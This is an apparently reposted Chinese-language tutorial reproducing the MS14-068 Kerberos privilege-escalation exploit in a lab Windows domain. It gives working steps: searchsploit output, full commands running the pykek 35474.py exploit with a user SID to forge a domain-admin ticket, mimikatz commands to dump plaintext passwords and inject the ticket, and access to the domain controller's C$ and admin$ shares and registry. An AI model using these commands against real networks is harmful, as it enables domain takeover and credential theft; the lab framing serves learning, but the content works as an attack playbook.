MS14-068提權


•    Ms14-068 
•    庫 
•    https://github.com/bidord/pykek 
•    ms14-068.py -u user@lab.com -s userSID -d dc.lab.com 
•    拷貝 TGT_user1@lab.com.ccache 到windows系統 
•    本地管理員登陸 
•    mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit 

現在使用域管理的情況越來越多了 (域是一個微軟的自己的定義 安全邊界)

拿到域管理的權限

前提

你要有本機的管理員權限

這個漏洞如果成功 你就可以在一台普通的域成員的電腦上獲得域管理的權限

0X02所以這個環境需要在一個域里面實現

讓我們的2003加入域

右鍵電腦屬性 然后加入域  然后輸入一個有域管理權限的賬號

在域控下輸入 為域成員分配賬號

 

dsa.msc

 

 

 

 

 然后我們老規矩 在kali里面搜索看看有沒有這個漏洞的exp

0X03復現

root@kali:~# searchsploit ms14-068
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft Windows Kerberos - Privilege | exploits/windows/remote/35474.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result

 

 wce抓取明文密碼

兩個::就是mimikatz的幫助

域里面的賬號啊計算機都會出來

找密碼  logonPasswords

現在開始利用漏洞

先找到sid

 

用kali生成票據

S-1-5-21-4100994999-1504190964-414678929-1118

 如果你的kali的python沒有相關的模板這里下載

https://github.com/bidord/pykek 

 完整代碼

root@kali:~# python 35474.py -u zhong2@ZHONGQI.com -s S-1-5-21-4100994999-1504190964-414678929-1118 -d DC.zhongqi.com

這里由於我們的kali不在域里面所以我們用域控ip

root@kali:~# python 35474.py -u zhong2@ZHONGQI.com -s S-1-5-21-4100994999-1504190964-414678929-1118 -d 192.168.1.132

然后我們把票據拷貝到win2003域成員上面去 這里不是

把票據放在和mimikatz一起

•    mimikatz.exe kerberos::ptc TGT_zhong2@ZHONG.com.ccache

然后就直接把本地管理提升為域管理

SID在任何ip上都是不變的

成功了后我們在本地管理連接DC的C盤

 

\\DC.ZHONGQI.COM\c$
或者看管理共享
\\DC.ZHONGQI.COM\admin$

 

 也可以連接訪問DC的注冊表

regedit

 

 

 

成功訪問

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM